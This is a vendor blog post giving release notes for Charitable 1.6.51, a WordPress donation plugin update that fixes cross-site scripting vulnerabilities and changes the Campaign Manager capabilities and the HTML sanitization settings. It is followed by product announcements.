Charitable Blog

Everything you need to know about Charitable and our team.

Release Notes: Charitable 1.6.51 Fixes a Critical Security Vulnerability

Last updated on

  • By
Eric Daams

Last Friday we released Charitable 1.6.51, which fixes a critical security vulnerability affecting any website using Charitable. While we are not aware of any exploits of the vulnerability, we are urging everyone to upgrade to Charitable 1.6.51 as soon as possible.

For those using Charitable Ambassadors, version 2.1.8 was released yesterday, providing additional security fixes and updating is highly recommended. Charitable Recurring Donations 1.2.9 also has a small fix today related to form validation.

A bit of background

Last week, Charitable user Asif Minhas reached out to us about a Cross Site Scripting vulnerability. This vulnerability was limited in its severity, as it could only be exploited by users with the Campaign Manager role. This vulnerability has also been fixed in Charitable 1.6.51.

In the process of investigating this, we discovered a much more serious Cross Site Scripting vulnerability that could be exploited by anonymous users. The vulnerability was found on Thursday afternoon and on Friday evening we released Charitable 1.6.51.

There are a number of changes in Charitable 1.6.51 that may affect some users, which we will cover in a little more detail below.

Campaign Managers and the unfiltered_html capability

Charitable 1.6.51 removes the unfiltered_html capability from the Campaign Manager role. This means that Campaign Managers will not be able to add certain HTML tags such as <iframe> and <embed>, as well as Javascript code.

While there can be good reasons for Campaign Managers to have this role, we determined that the default in Charitable should be for this capability to only be available to Administrators. (WordPress also makes this capability available to the Editor role, but Editors are not able to create or edit campaigns, so this does not affect Charitable).

If you would like to continue providing Campaign Managers with the unfiltered_html capability, this can be achieved by using one of the role capability editor plugins listed at https://wordpress.org/support/article/roles-and-capabilities/#plugins.

Quick aside: As mentioned above, Editors and Administrators both have the ability to add unfiltered_html. If you would like to disable this altogether, you can do so by adding the following line to your wp-config.php file:

define( 'DISALLOW_UNFILTERED_HTML', true );

Adding HTML to donation amount descriptions

Previously, when adding suggested donation amounts, it was possible to add HTML to the suggested donation amount descriptions. With Charitable 1.6.51, this will no longer be possible by default.

But if you really want to be able to add HTML to your suggested donation amount descriptions, you can re-enable this ability using the charitable_sanitize_suggested_amount_description filter, by simple adding the following to a custom plugin, your theme’s functions.php file, or with a plugin like Code Snippets:

add_filter( 'charitable_sanitize_suggested_amount_description', '__return_false' );

Is it safe to do this? That depends on your situation. If the only people creating campaigns on your website are Administrators, then this should be fine. However, if you have Campaign Managers creating campaigns as well, or if you are using Charitable Ambassadors and campaign creators can set suggested amounts for their campaigns, be aware that this does allow those users to add HTML to their amount descriptions as well.

That said, even if you do turn off sanitization of the suggested amount descriptions, Charitable still ensures that no unsafe HTML is added, such as Javascript code, by filtering the content using wp_kses_post.

A final word

We’re sorry to everyone using Charitable for this security vulnerability. We’re disappointed and frankly more than a little bit embarrassed by this. We will continue to do our absolute best to make sure that Charitable is a simple, secure way for you to accept donations on your website.

Thank you to Asif Minhas, who reported the vulnerability related to Campaign Managers, and Robert Rowley from WPScan who was also in touch regarding the Campaign Managers issue.

If you have any concerns about this release or would like a hand with anything else related to Charitable, get in touch with us! We’re always happy to help.

If you have found a security vulnerability and would like to report it, please email us at [email protected].

author avatar
Eric Daams
See Full Bio

Disclosure: Our content is reader-supported. This means if you click on some of our links, then we may earn a commission. We only recommend products that we believe will add value to our readers.

Leave a Reply

Your email address will not be published. Required fields are marked *

Get free tips and resources right in your inbox, along with 60,000+ others

Join our Newsletter

We won’t spam you. We only send an email when we think it will genuinely help you. Unsubscribe at any time!

Follow Us

Featured Video:

Watch more videos on our YouTube channel.

Popular Resources

Recurring Donations

Donor Management

Peer-to-Peer Fundraising

Integrations

Extensions

What's New In Charitable

🔔 Subscribe to get our latest updates
📧 Subscribe to Emails

Email Subscription

Join our Newsletter

We won’t spam you. We only send an email when we think it will genuinely help you. Unsubscribe at any time!

Addon New

🤯 New Addon: Campaign Updates

Keep your supporters informed and engaged with every step of your progress! Share the ongoing impact of your mission and build lasting trust with your donor community!

The Ultimate Engagement Tool

Fundraising is a journey, not a one-time event. Now, you can easily provide real-time updates directly on your campaign pages, ensuring your donors stay connected to the causes they care about most.

📣 Easy Storytelling: Quickly post text updates, milestones, or field reports to show exactly how donations are being put to work, keeping the momentum alive throughout your fundraiser.

🏗️ Visual Builder Integration: Seamlessly add the Updates block anywhere on your page using our drag-and-drop builder, or use a simple shortcode to display news in widgets and sidebars.

📩 Build Donor Trust: By consistently sharing progress and success stories, you create a transparent giving experience that encourages recurring support and deeper community involvement.

author avatar
Eric Daams
See Full Bio
Integration New

Build Beautiful Fundraising Pages Visually with WPBakery Integration

We are excited to announce our brand-new integration with WPBakery, one of the most popular WordPress page builders, designed to help you create stunning layouts for your campaigns without touching a single line of code.

The Ultimate Design Experience

Designing your nonprofit’s website should be as simple as your mission is powerful. Now, you can bring Charitable functionality directly into your WPBakery workflow, using native elements to build high-converting donation pages and campaign grids in seconds.

🖱️ Drag-and-Drop Building: Easily add donation forms, campaign progress bars, and “Donate Now” buttons to your layouts using the WPBakery elements you already know and love.

🎨 Total Creative Control: Customize the look and feel of your fundraising elements using WPBakery’s native design options. Adjust margins, padding, and borders to ensure your campaigns fit perfectly with your site’s branding.

📱 Seamlessly Responsive: Every element is built to be fully responsive and mobile-friendly, ensuring your donors have a smooth, professional experience whether they are giving from a phone, tablet, or desktop.

author avatar
Eric Daams
See Full Bio
Integration New

🖼️ Add Image Galleries to Fundraising Campaigns With Envira Gallery

Showcase the impact of your mission like never before. We are excited to announce our brand-new integration with Envira Gallery, the best WordPress gallery plugin, designed to help you tell your story through powerful, high-performance visuals.

The Ultimate Storytelling Experience

A picture is worth a thousand words – and now, it’s worth even more for your fundraising. Connect your visual impact directly to your cause by creating stunning, responsive galleries that engage donors and drive contributions.

🖼️ Visual Impact: Easily create beautiful, fast-loading galleries to show your nonprofit’s work in action, from field reports to event highlights.

🔗 Seamless Connection: Link gallery images directly to your fundraising campaigns, making it effortless for inspired visitors to go from viewing a photo to making a donation.

📱 Perfectly Responsive: Whether your donors are on a phone, tablet, or desktop, your galleries will look professional and load lightning-fast, ensuring a smooth experience on every device.

author avatar
Eric Daams
See Full Bio
Integration New

👉🏻 New Divi Integration In Charitable Pro

Bring the power of Charitable directly into your favorite page builder and maintain total creative control with our brand-new Divi integration.

The Ultimate Design Experience

No more switching back and forth or relying on complex shortcodes. Use dedicated Divi modules to build, style, and launch high-converting donation pages without ever leaving the Divi Builder.

⚡ Native Divi Modules: Effortlessly drag and drop your donation forms, progress bars, and campaign details exactly where you want them.

⚙️ Visual Customization: Tweak colors, fonts, and spacing using Divi’s familiar design settings to ensure your fundraiser matches your brand perfectly.

🚀 Live Visual Editing: See your changes in real-time. What you see in the builder is exactly what your donors will see, ensuring a seamless giving experience every time.

author avatar
Eric Daams
See Full Bio
donation form New

👉🏻 New Campaign Selector For Donation Forms

Take your campaign management to the next level. Find the perfect fundraiser for any page and stay in your creative flow with our new Campaign Selector integration.

The Ultimate Selection Tool

No more hunting for IDs or creating one page for every donation form. Use the new Campaign Selector to allow users to switch to a campaign with no code.

⚡ Instant Search: Quickly find any campaign leaving your page or post.

⚙️ Editor Agnostic: Whether you’re using the Block Editor, Elementor, or WPBakery, selecting your campaigns is now a unified experience.

🚀 Real-Time Previews: See exactly which campaign you’ve selected instantly, ensuring your donors always see the right cause.

author avatar
Eric Daams
See Full Bio
View All Announcements